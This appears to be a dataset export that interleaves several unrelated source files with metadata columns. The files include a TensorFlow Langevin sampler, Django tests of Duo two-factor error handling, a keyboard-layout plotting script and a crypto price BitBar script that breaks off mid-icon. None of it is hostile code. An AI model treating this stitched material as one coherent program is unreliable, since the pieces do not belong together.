# fuhao = '/'
# maskpath = fuhao.join(list_)
## print(maskpath)
#
# f.write(files_list[_file]+','+maskpath+filename+'\n')
# print(files_list[_file]+','+maskpath+filename)
#
# f.close()
| 39.892031
| 142
| 0.580423
| 1,902
| 15,518
| 4.473186
| 0.064143
| 0.067701
| 0.095205
| 0.122238
| 0.899389
| 0.890339
| 0.859191
| 0.83733
| 0.821932
| 0.805712
| 0
| 0.013182
| 0.222709
| 15,518
| 389
| 143
| 39.892031
| 0.692174
| 0.742299
| 0
| 0.28
| 0
| 0.08
| 0.188904
| 0.158357
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.08
| null | null | 0.08
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0b147e57e9e49f36d711a4f838ff66d21ac36a78
| 2,526
|
py
|
Python
|
sgld_sampler.py
|
chrku/TF2-Energy-Based-Models
|
a0712cbef86f41b48d3a645bdfc3a5c47c547cd1
|
[
"MIT"
] | 6
|
2021-02-04T17:24:32.000Z
|
2022-03-18T01:34:23.000Z
|
sgld_sampler.py
|
chrku/TF2-Energy-Based-Models
|
a0712cbef86f41b48d3a645bdfc3a5c47c547cd1
|
[
"MIT"
] | null | null | null |
sgld_sampler.py
|
chrku/TF2-Energy-Based-Models
|
a0712cbef86f41b48d3a645bdfc3a5c47c547cd1
|
[
"MIT"
] | 2
|
2021-09-22T16:22:20.000Z
|
2022-01-29T16:29:13.000Z
|
import tensorflow as tf
@tf.function
def sgld_sample(E, x_initial, num_steps, step_size, var, clip_thresh=tf.constant(0.01), constrain_results=False):
"""
Do SGLD (stochastic gradient Langevin dynamics) sampling step
:param E: Energy function
:param x_initial: initial sample position, of shape (batch_size, ndims)
:param num_steps: number of sampling steps
:param step_size: step size used in gradient part
:param var: variance for isotropic Gaussian used in update
:param clip_thresh: threshold for gradient clipping; prevents energy gradients from growing too large
:param constrain_results: Constrain results between 0 and 1
:return: new sample
"""
x_k = x_initial
for _ in range(num_steps):
with tf.GradientTape() as g:
g.watch(x_k)
energy = tf.math.reduce_sum(E(x_k, training=False))
gradient = g.gradient(energy, x_k)
dE_dx = tf.clip_by_value(gradient, -clip_thresh, clip_thresh)
x_k = x_k - (step_size / 2) * dE_dx + tf.random.normal(x_k.shape, mean=0.0, stddev=tf.math.sqrt(var))
if constrain_results:
x_k = tf.clip_by_value(x_k, 0.0, 1.0)
return x_k
@tf.function
def sgld_sample_diag(E, x_initial, num_steps, step_size, var, clip_thresh=tf.constant(0.01), constrain_results=False):
"""
Do SGLD (stochastic gradient Langevin dynamics) sampling step, record average gradient magnitude
:param E: Energy function
:param x_initial: initial sample position, of shape (batch_size, ndims)
:param num_steps: number of sampling steps
:param step_size: step size used in gradient part
:param var: variance for isotropic Gaussian used in update
:param clip_thresh: threshold for gradient clipping; prevents energy gradients from growing too large
:param constrain_results: Constrain results between 0 and 1
:return: new sample, avg. gradient magnitude
"""
x_k = x_initial
r_s = 0.0
for _ in range(num_steps):
with tf.GradientTape() as g:
g.watch(x_k)
energy = tf.math.reduce_sum(E(x_k, training=False))
gradient = g.gradient(energy, x_k)
dE_dx = tf.clip_by_value(gradient, -clip_thresh, clip_thresh)
r_s += tf.reduce_mean(tf.linalg.norm(dE_dx, axis=1))
x_k = x_k - (step_size / 2) * dE_dx + tf.random.normal(x_k.shape, mean=0.0, stddev=tf.math.sqrt(var))
if constrain_results:
x_k = tf.clip_by_value(x_k, 0.0, 1.0)
return x_k, r_s / tf.cast(num_steps, tf.float32)
| 45.107143
| 118
| 0.692399
| 400
| 2,526
| 4.175
| 0.23
| 0.023952
| 0.007186
| 0.031138
| 0.905389
| 0.877844
| 0.877844
| 0.877844
| 0.877844
| 0.877844
| 0
| 0.014588
| 0.212985
| 2,526
| 55
| 119
| 45.927273
| 0.825453
| 0.414489
| 0
| 0.758621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.034483
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50291fde1cde1ed4a1f521b7778f5e118537a93a
| 502
|
py
|
Python
|
pybrain/rl/environments/twoplayergames/capturegameplayers/__init__.py
|
sveilleux1/pybrain
|
1e1de73142c290edb84e29ca7850835f3e7bca8b
|
[
"BSD-3-Clause"
] | 2,208
|
2015-01-02T02:14:41.000Z
|
2022-03-31T04:45:46.000Z
|
pybrain/rl/environments/twoplayergames/capturegameplayers/__init__.py
|
sveilleux1/pybrain
|
1e1de73142c290edb84e29ca7850835f3e7bca8b
|
[
"BSD-3-Clause"
] | 91
|
2015-01-08T16:42:16.000Z
|
2021-12-11T19:16:35.000Z
|
pybrain/rl/environments/twoplayergames/capturegameplayers/__init__.py
|
sveilleux1/pybrain
|
1e1de73142c290edb84e29ca7850835f3e7bca8b
|
[
"BSD-3-Clause"
] | 786
|
2015-01-02T15:18:20.000Z
|
2022-02-23T23:42:40.000Z
|
from pybrain.rl.environments.twoplayergames.capturegameplayers.randomplayer import RandomCapturePlayer
from pybrain.rl.environments.twoplayergames.capturegameplayers.killing import KillingPlayer
from pybrain.rl.environments.twoplayergames.capturegameplayers.nonsuicide import NonSuicidePlayer
from pybrain.rl.environments.twoplayergames.capturegameplayers.moduledecision import ModuleDecidingPlayer
from pybrain.rl.environments.twoplayergames.capturegameplayers.clientwrapper import ClientCapturePlayer
| 100.4
| 105
| 0.912351
| 45
| 502
| 10.177778
| 0.377778
| 0.120087
| 0.141921
| 0.272926
| 0.622271
| 0.622271
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037849
| 502
| 5
| 106
| 100.4
| 0.94824
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
502ade2ab1b166cba60bf93f6825985514569761
| 12,981
|
py
|
Python
|
psono/restapi/tests/utils/duo.py
|
dirigeant/psono-server
|
a18c5b3c4d8bbbe4ecf1615b210d99fb77752205
|
[
"Apache-2.0",
"CC0-1.0"
] | 48
|
2018-04-19T15:50:58.000Z
|
2022-01-23T15:58:11.000Z
|
psono/restapi/tests/utils/duo.py
|
dirigeant/psono-server
|
a18c5b3c4d8bbbe4ecf1615b210d99fb77752205
|
[
"Apache-2.0",
"CC0-1.0"
] | 9
|
2018-09-13T14:56:18.000Z
|
2020-01-17T16:44:33.000Z
|
psono/restapi/tests/utils/duo.py
|
dirigeant/psono-server
|
a18c5b3c4d8bbbe4ecf1615b210d99fb77752205
|
[
"Apache-2.0",
"CC0-1.0"
] | 11
|
2019-09-20T11:53:47.000Z
|
2021-07-18T22:41:31.000Z
|
from django.test import TestCase
from socket import gaierror
from ssl import SSLError
from mock import patch
import time
from restapi.utils import duo_auth_check, duo_auth_enroll, duo_auth_enroll_status, duo_auth_auth
class TestDuoAuthCheckUtils(TestCase):
def mock_check(self):
return {
'time': int(time.time())
}
def mock_invalid_host(self):
raise gaierror
def mock_invalid_cert(self):
raise SSLError
def mock_invalid_integration_key(self):
raise RuntimeError('Invalid integration key')
def mock_invalid_secret_key(self):
raise RuntimeError('Invalid signature')
def mock_other_api_error(self):
raise RuntimeError('Other API Error')
def mock_duo_offline(self):
# raise any irregular exception
raise Exception
@patch('duo_client.Auth.check', mock_check)
def test_duo_auth_check_success(self):
result = duo_auth_check('integration_key', 'secret_key', 'host')
self.assertTrue('time' in result)
@patch('duo_client.Auth.check', mock_invalid_host)
def test_duo_auth_check_invalid_host(self):
result = duo_auth_check('integration_key', 'secret_key', 'host')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Host incorrect: Could not be found')
@patch('duo_client.Auth.check', mock_invalid_cert)
def test_duo_auth_check_invalid_cert(self):
result = duo_auth_check('integration_key', 'secret_key', 'host')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Host incorrect: SSL Certificate Error')
@patch('duo_client.Auth.check', mock_invalid_integration_key)
def test_duo_auth_check_invalid_integration_key(self):
result = duo_auth_check('integration_key', 'secret_key', 'host')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Invalid integration key')
@patch('duo_client.Auth.check', mock_invalid_secret_key)
def test_duo_auth_check_invalid_secret_key(self):
result = duo_auth_check('integration_key', 'secret_key', 'host')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Invalid secret key')
@patch('duo_client.Auth.check', mock_other_api_error)
def test_duo_auth_check_other_api_error(self):
result = duo_auth_check('integration_key', 'secret_key', 'host')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Other API Error')
@patch('duo_client.Auth.check', mock_duo_offline)
def test_duo_auth_check_duo_offline(self):
result = duo_auth_check('integration_key', 'secret_key', 'host')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Duo offline. Try again later.')
class TestDuoAuthEnrollUtils(TestCase):
def mock_enroll(self, username):
return {
'time': int(time.time())
}
def mock_preauth(self, username):
return {
'result': 'enroll'
}
def mock_invalid_host(self, username):
raise gaierror
def mock_invalid_cert(self, username):
raise SSLError
def mock_invalid_integration_key(self, username):
raise RuntimeError('Invalid integration key')
def mock_invalid_secret_key(self, username):
raise RuntimeError('Invalid signature')
def mock_username_already_exists(self, username):
raise RuntimeError('username already exists')
def mock_other_api_error(self, username):
raise RuntimeError('Other API Error')
def mock_duo_offline(self, username):
# raise any irregular exception
raise Exception
@patch('duo_client.Auth.enroll', mock_enroll)
@patch('duo_client.Auth.preauth', mock_preauth)
def test_duo_auth_check_success(self):
result = duo_auth_enroll('integration_key', 'secret_key', 'host', 'username')
self.assertTrue('time' in result)
@patch('duo_client.Auth.enroll', mock_invalid_host)
@patch('duo_client.Auth.preauth', mock_preauth)
def test_duo_auth_enroll_invalid_host(self):
result = duo_auth_enroll('integration_key', 'secret_key', 'host', 'username')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Host incorrect: Could not be found')
@patch('duo_client.Auth.enroll', mock_invalid_cert)
@patch('duo_client.Auth.preauth', mock_preauth)
def test_duo_auth_enroll_invalid_cert(self):
result = duo_auth_enroll('integration_key', 'secret_key', 'host', 'username')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Host incorrect: SSL Certificate Error')
@patch('duo_client.Auth.enroll', mock_invalid_integration_key)
@patch('duo_client.Auth.preauth', mock_preauth)
def test_duo_auth_enroll_invalid_integration_key(self):
result = duo_auth_enroll('integration_key', 'secret_key', 'host', 'username')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Invalid integration key')
@patch('duo_client.Auth.enroll', mock_invalid_secret_key)
@patch('duo_client.Auth.preauth', mock_preauth)
def test_duo_auth_enroll_invalid_secret_key(self):
result = duo_auth_enroll('integration_key', 'secret_key', 'host', 'username')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Invalid secret key')
@patch('duo_client.Auth.enroll', mock_username_already_exists)
@patch('duo_client.Auth.preauth', mock_preauth)
def test_duo_auth_enroll_username_already_exists(self):
result = duo_auth_enroll('integration_key', 'secret_key', 'host', 'username')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Username already exists in Duo.')
@patch('duo_client.Auth.enroll', mock_other_api_error)
@patch('duo_client.Auth.preauth', mock_preauth)
def test_duo_auth_enroll_invalid_other_api_error(self):
result = duo_auth_enroll('integration_key', 'secret_key', 'host', 'username')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Other API Error')
@patch('duo_client.Auth.enroll', mock_duo_offline)
@patch('duo_client.Auth.preauth', mock_preauth)
def test_duo_auth_enroll_invalid_duo_offline(self):
result = duo_auth_enroll('integration_key', 'secret_key', 'host', 'username')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Duo offline. Try again later.')
class TestDuoAuthEnrollStatusUtils(TestCase):
def mock_enroll_status(self, user_id, activation_code):
return 'success'
def mock_invalid_host(self, user_id, activation_code):
raise gaierror
def mock_invalid_cert(self, user_id, activation_code):
raise SSLError
def mock_invalid_integration_key(self, user_id, activation_code):
raise RuntimeError('Invalid integration key')
def mock_invalid_secret_key(self, user_id, activation_code):
raise RuntimeError('Invalid signature')
def mock_other_api_error(self, user_id, activation_code):
raise RuntimeError('Other API Error')
def mock_duo_offline(self, user_id, activation_code):
# raise any irregular exception
raise Exception
@patch('duo_client.Auth.enroll_status', mock_enroll_status)
def test_duo_auth_check_success(self):
result = duo_auth_enroll_status('integration_key', 'secret_key', 'host', 'user_id', 'activation_code')
self.assertEqual(result, 'success')
@patch('duo_client.Auth.enroll_status', mock_invalid_host)
def test_duo_auth_enroll_status_invalid_host(self):
result = duo_auth_enroll_status('integration_key', 'secret_key', 'host', 'user_id', 'activation_code')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Host incorrect: Could not be found')
@patch('duo_client.Auth.enroll_status', mock_invalid_cert)
def test_duo_auth_enroll_status_invalid_cert(self):
result = duo_auth_enroll_status('integration_key', 'secret_key', 'host', 'user_id', 'activation_code')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Host incorrect: SSL Certificate Error')
@patch('duo_client.Auth.enroll_status', mock_invalid_integration_key)
def test_duo_auth_enroll_status_invalid_integration_key(self):
result = duo_auth_enroll_status('integration_key', 'secret_key', 'host', 'user_id', 'activation_code')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Invalid integration key')
@patch('duo_client.Auth.enroll_status', mock_invalid_secret_key)
def test_duo_auth_enroll_status_invalid_secret_key(self):
result = duo_auth_enroll_status('integration_key', 'secret_key', 'host', 'user_id', 'activation_code')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Invalid secret key')
@patch('duo_client.Auth.enroll_status', mock_other_api_error)
def test_duo_auth_enroll_status_other_api_error(self):
result = duo_auth_enroll_status('integration_key', 'secret_key', 'host', 'user_id', 'activation_code')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Other API Error')
@patch('duo_client.Auth.enroll_status', mock_duo_offline)
def test_duo_auth_enroll_status_duo_offline(self):
result = duo_auth_enroll_status('integration_key', 'secret_key', 'host', 'user_id', 'activation_code')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Duo offline. Try again later.')
class TestDuoAuthAuthUtils(TestCase):
def mock_auth(self, username, factor, device, pushinfo, passcode, async_txn):
return {
# Something
}
def mock_invalid_host(self, username, factor, device, pushinfo, passcode, async_txn):
raise gaierror
def mock_invalid_cert(self, username, factor, device, pushinfo, passcode, async_txn):
raise SSLError
def mock_invalid_integration_key(self, username, factor, device, pushinfo, passcode, async_txn):
raise RuntimeError('Invalid integration key')
def mock_invalid_secret_key(self, username, factor, device, pushinfo, passcode, async_txn):
raise RuntimeError('Invalid signature')
def mock_other_api_error(self, username, factor, device, pushinfo, passcode, async_txn):
raise RuntimeError('Other API Error')
def mock_duo_offline(self, username, factor, device, pushinfo, passcode, async_txn):
# raise any irregular exception
raise Exception
@patch('duo_client.Auth.auth', mock_auth)
def test_duo_auth_check_success(self):
result = duo_auth_auth('integration_key', 'secret_key', 'host', 'username', 'factor', 'device')
self.assertTrue(isinstance(result, dict) and 'error' not in result)
@patch('duo_client.Auth.auth', mock_invalid_host)
def test_duo_auth_auth_invalid_host(self):
result = duo_auth_auth('integration_key', 'secret_key', 'host', 'username', 'factor', 'device')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Host incorrect: Could not be found')
@patch('duo_client.Auth.auth', mock_invalid_cert)
def test_duo_auth_auth_invalid_cert(self):
result = duo_auth_auth('integration_key', 'secret_key', 'host', 'username', 'factor', 'device')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Host incorrect: SSL Certificate Error')
@patch('duo_client.Auth.auth', mock_invalid_integration_key)
def test_duo_auth_auth_invalid_integration_key(self):
result = duo_auth_auth('integration_key', 'secret_key', 'host', 'username', 'factor', 'device')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Invalid integration key')
@patch('duo_client.Auth.auth', mock_invalid_secret_key)
def test_duo_auth_auth_invalid_secret_key(self):
result = duo_auth_auth('integration_key', 'secret_key', 'host', 'username', 'factor', 'device')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Invalid secret key')
@patch('duo_client.Auth.auth', mock_other_api_error)
def test_duo_auth_auth_other_api_error(self):
result = duo_auth_auth('integration_key', 'secret_key', 'host', 'username', 'factor', 'device')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Other API Error')
@patch('duo_client.Auth.auth', mock_duo_offline)
def test_duo_auth_auth_duo_offline(self):
result = duo_auth_auth('integration_key', 'secret_key', 'host', 'username', 'factor', 'device')
self.assertTrue('error' in result)
self.assertEqual(result['error'], 'Duo offline. Try again later.')
| 41.340764
| 110
| 0.707187
| 1,644
| 12,981
| 5.268856
| 0.046837
| 0.050104
| 0.059801
| 0.076888
| 0.923805
| 0.912607
| 0.876241
| 0.788502
| 0.708151
| 0.669476
| 0
| 0
| 0.17672
| 12,981
| 313
| 111
| 41.472843
| 0.810517
| 0.009938
| 0
| 0.539823
| 0
| 0
| 0.25255
| 0.055274
| 0
| 0
| 0
| 0
| 0.238938
| 1
| 0.261062
| false
| 0.030973
| 0.026549
| 0.022124
| 0.327434
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
503b2ee9818e39c40c49dcffac2c640d4622d371
| 142
|
py
|
Python
|
mysite/test2/views.py
|
GavinZhuLei/GavinsDjango
|
9c977de1b1d521c99853ef0c982070d4a8cae076
|
[
"Apache-2.0"
] | null | null | null |
mysite/test2/views.py
|
GavinZhuLei/GavinsDjango
|
9c977de1b1d521c99853ef0c982070d4a8cae076
|
[
"Apache-2.0"
] | null | null | null |
mysite/test2/views.py
|
GavinZhuLei/GavinsDjango
|
9c977de1b1d521c99853ef0c982070d4a8cae076
|
[
"Apache-2.0"
] | null | null | null |
#__author__ = 'root'
from django.shortcuts import render_to_response
def index(request):
return render_to_response('test2/index.html',{})
| 28.4
| 52
| 0.774648
| 19
| 142
| 5.368421
| 0.789474
| 0.156863
| 0.313725
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007874
| 0.105634
| 142
| 5
| 52
| 28.4
| 0.795276
| 0.133803
| 0
| 0
| 0
| 0
| 0.130081
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
504496ae7767b71bd0894baa74c7803853217f6a
| 3,895
|
py
|
Python
|
notes/ideal_keyboard.py
|
Erotemic/misc
|
6f8460a690d05e7e0117becc6cae9902cbe2cedd
|
[
"Apache-2.0"
] | 5
|
2021-04-29T21:07:18.000Z
|
2021-09-29T08:46:08.000Z
|
notes/ideal_keyboard.py
|
Erotemic/misc
|
6f8460a690d05e7e0117becc6cae9902cbe2cedd
|
[
"Apache-2.0"
] | null | null | null |
notes/ideal_keyboard.py
|
Erotemic/misc
|
6f8460a690d05e7e0117becc6cae9902cbe2cedd
|
[
"Apache-2.0"
] | 1
|
2018-04-07T12:26:21.000Z
|
2018-04-07T12:26:21.000Z
|
import kwplot
import numpy as np
import kwimage
kwplot.autompl()
f = 8
blank_key = np.zeros((64 * f, 54 * f, 3))
blank_key[:, :, :] = np.array(kwimage.Color('darkgray').as255())[None, None, :]
blank_key[0:f * 2, :] = (3, 3, 3)
blank_key[-f * 2:, :] = (3, 3, 3)
blank_key[:, 0:f * 2] = (3, 3, 3)
blank_key[:, -f * 2:] = (3, 3, 3)
key = kwimage.draw_text_on_image(blank_key.copy(), text='!\n1', halign='center', valign='center', color='white')
kwplot.imshow(key)
tab_symbol = '->'
left_rows = []
alt_text0 = [None, None, None, None, None, None, None, None]
row_text0 = ['esc', 'F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'caps']
left_rows += [(alt_text0, row_text0)]
alt_text1 = [None, '~', '!', '@', '#', '$', '%', None]
row_text1 = ['tab', '`', '1', '2', '3', '4', '5', 'win']
left_rows += [(alt_text1, row_text1)]
alt_text2 = ['|', '?', None, None, None, None, None, None]
row_text2 = ['\\', '/', 'q', 'w', 'e', 'r', 't', 'del']
left_rows += [(alt_text2, row_text2)]
alt_text3 = [None, None, None, None, None, None, None, None]
row_text3 = ['shift', 'shift', 'a', 's', 'd', 'f', 'g', 'tab']
left_rows += [(alt_text3, row_text3)]
alt_text3 = [None, None, None, None, None, None, None, None]
row_text3 = ['ctrl', 'ctrl', 'z', 'x', 'c', 'v', 'b', 'bksp']
left_rows += [(alt_text3, row_text3)]
alt_text4 = [None, None, None, None, None, None, None, None]
row_text4 = ['alt', 'home', 'pup', 'end', 'pdwn', 'end', 'space', 'enter']
left_rows += [(alt_text4, row_text4)]
row_stack = []
for alt_text, row_text in left_rows:
row_keys = []
for t, a in zip(row_text, alt_text):
if len(t) == 1:
fontScale = 4
thickness = 6
else:
fontScale = 1
thickness = 4
if a is None:
text = t
else:
text = a + '\n\n' + t
key = kwimage.draw_text_on_image(blank_key.copy(), text=text, halign='center', valign='center', color='white', fontScale=4, thickness=thickness)
row_keys.append(key)
row = kwimage.stack_images(row_keys, axis=1, pad=1)
row_stack.append(row)
left_side = kwimage.stack_images(row_stack, axis=0, pad=1)
right_rows = []
alt_text0 = [None, None, None, None, None, None, None, None]
row_text0 = ['Prt\nScn', 'F7', 'F8', 'F9', 'F10', 'F11', 'F12', 'DEL']
right_rows += [(alt_text0, row_text0)]
alt_text1 = [None, '^', '&', '*', '(', ')', '_', '+']
row_text1 = ['win', '6', '7', '8', '9', '0', '-', '=']
right_rows += [(alt_text1, row_text1)]
alt_text2 = [None, None, None, None, None, None, '{', '}']
row_text2 = ['del', 'y', 'u', 'i', 'o', 'p', '[', ']']
right_rows += [(alt_text2, row_text2)]
alt_text3 = [None, None, None, None, None, ':', None, None]
row_text3 = ['tab', 'h', 'j', 'k', 'l', ';', 'shift', 'shift']
right_rows += [(alt_text3, row_text3)]
alt_text3 = [None, None, None, '<', '>', '"', None, None]
row_text3 = ['bksp', 'n', 'm', ',', '.', '\'', 'ctrl', 'ctrl']
right_rows += [(alt_text3, row_text3)]
alt_text4 = [None, None, None, None, None, None, None, None]
row_text4 = ['enter', 'space', '<', '^', 'V', '>', 'alt', 'alt']
right_rows += [(alt_text4, row_text4)]
row_stack = []
for alt_text, row_text in right_rows:
row_keys = []
for t, a in zip(row_text, alt_text):
if len(t) == 1:
fontScale = 4
thickness = 6
else:
fontScale = 1
thickness = 4
if a is None:
text = t
else:
text = a + '\n\n' + t
key = kwimage.draw_text_on_image(blank_key.copy(), text=text, halign='center', valign='center', color='white', fontScale=4, thickness=thickness)
row_keys.append(key)
row = kwimage.stack_images(row_keys, axis=1, pad=1)
row_stack.append(row)
right_side = kwimage.stack_images(row_stack, axis=0, pad=1)
image = kwimage.stack_images([left_side, right_side], axis=1, pad=300)
kwplot.imshow(image)
| 30.669291
| 152
| 0.560719
| 572
| 3,895
| 3.620629
| 0.20979
| 0.247224
| 0.301304
| 0.324481
| 0.761468
| 0.761468
| 0.745051
| 0.732496
| 0.701593
| 0.697731
| 0
| 0.040637
| 0.21027
| 3,895
| 126
| 153
| 30.912698
| 0.63264
| 0
| 0
| 0.478261
| 0
| 0
| 0.076508
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.032609
| 0
| 0.032609
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ac9bd2104d9d8a3fc9bdf6a48fa0772305e7b7b1
| 77,423
|
py
|
Python
|
c20.30s.py
|
hongkongkiwi/bitbar_c20
|
021ec91b19c612a1dd780774a64865421bc25168
|
[
"MIT"
] | null | null | null |
c20.30s.py
|
hongkongkiwi/bitbar_c20
|
021ec91b19c612a1dd780774a64865421bc25168
|
[
"MIT"
] | null | null | null |
c20.30s.py
|
hongkongkiwi/bitbar_c20
|
021ec91b19c612a1dd780774a64865421bc25168
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# coding=utf-8
#
# <bitbar.title>C20 NAV and Asset Worth</bitbar.title>
# <bitbar.version>v1.0</bitbar.version>
# <bitbar.desc>Displays current C20 NAV and USD asset worth</bitbar.desc>
from urllib import urlopen
url = urlopen('https://crypto20.com/status').read()
btg_url = urlopen('https://api.coinmarketcap.com/v1/ticker/bitcoin-gold/').read()
top_25 = urlopen('https://api.coinmarketcap.com/v1/ticker/?limit=25').read()
import json
result = json.loads(url)
btg_result = json.loads(btg_url)
top_25_result = json.loads(top_25);
number_of_c20 = 123.456 # change this to the number of C20 tokens that you own
# parse out price and put here
symbol_price = {
'bitcoin-gold': btg_result[0]['price_usd']
};
# loop through prices rather than call api more than once
for c in top_25_result:
symbol_price[c['id']] = float(c['price_usd'])
# symbol to name map
symbol_path_map = {
'BTC': 'bitcoin',
'ETH': 'ethereum',
'BCH': 'bitcoin-cash',
'XRP': 'ripple',
'DASH': 'dash',
'LTC': 'litecoin',
'MIOTA': 'iota',
'XMR': 'monero',
'NEO': 'neo',
'XEM': 'nem',
'ETC': 'ethereum-classic',
'LSK': 'lisk',
'QTUM': 'qtum',
'EOS': 'eos',
'ZEC': 'zcash',
'OMG': 'omisego',
'ADA': 'cardano',
'HSR': 'hshare',
'XLM': 'stellar',
'WAVES': 'waves',
'PPT': 'populous',
'STRAT': 'stratis',
'BTS': 'bitshares',
'ARK': 'ark',
'BTG': 'bitcoin-gold'
}
# symbol to icon map
symbol_image_map = {
'C20': 'iVBORw0KGgoAAAANSUhEUgAAACAAAAAlCAYAAAAjt+tHAAAAAXNSR0IArs4c6QAAACBjSFJNAAB6JgAAgIQAAPoAAACA6AAAdTAAAOpgAAA6mAAAF3CculE8AAAACXBIWXMAABYlAAAWJQFJUiTwAAADRGlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iWE1QIENvcmUgNS40LjAiPgogICA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPgogICAgICA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIgogICAgICAgICAgICB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iCiAgICAgICAgICAgIHhtbG5zOnRpZmY9Imh0dHA6Ly9ucy5hZG9iZS5jb20vdGlmZi8xLjAvIgogICAgICAgICAgICB4bWxuczpleGlmPSJodHRwOi8vbnMuYWRvYmUuY29tL2V4aWYvMS4wLyI+CiAgICAgICAgIDx4bXA6TW9kaWZ5RGF0ZT4yMDE3LTExLTIwVDA3OjExOjYzPC94bXA6TW9kaWZ5RGF0ZT4KICAgICAgICAgPHhtcDpDcmVhdG9yVG9vbD5QaXhlbG1hdG9yIDMuNzwveG1wOkNyZWF0b3JUb29sPgogICAgICAgICA8dGlmZjpPcmllbnRhdGlvbj4xPC90aWZmOk9yaWVudGF0aW9uPgogICAgICAgICA8dGlmZjpSZXNvbHV0aW9uVW5pdD4yPC90aWZmOlJlc29sdXRpb25Vbml0PgogICAgICAgICA8dGlmZjpDb21wcmVzc2lvbj41PC90aWZmOkNvbXByZXNzaW9uPgogICAgICAgICA8ZXhpZjpQaXhlbFhEaW1lbnNpb24+Mjg8L2V4aWY6UGl4ZWxYRGltZW5zaW9uPgogICAgICAgICA8ZXhpZjpDb2xvclNwYWNlPjE8L2V4aWY6Q29sb3JTcGFjZT4KICAgICAgICAgPGV4aWY6UGl4ZWxZRGltZW5zaW9uPjMyPC9leGlmOlBpeGVsWURpbWVuc2lvbj4KICAgICAgPC9yZGY6RGVzY3JpcHRpb24+CiAgIDwvcmRmOlJERj4KPC94OnhtcG1ldGE+Cl8ldHMAAAZoSURBVFgJxVhdbBRVFL73zuzO7rbbXeh/y6+tpbZoVMBQIXFTVEAgUqVCFIwxUcQXH9DEB2L6ZHwxxkQxmOAToqSYEK1SJGAVSBOoJj4UoUbaCF3Wli3d/52dmXs9Z9rCzu6sbKvBm8zOzJ3z891zzj33nJXIHEdXICD/Wr96jXvR8sVvN1QE+0ZG+F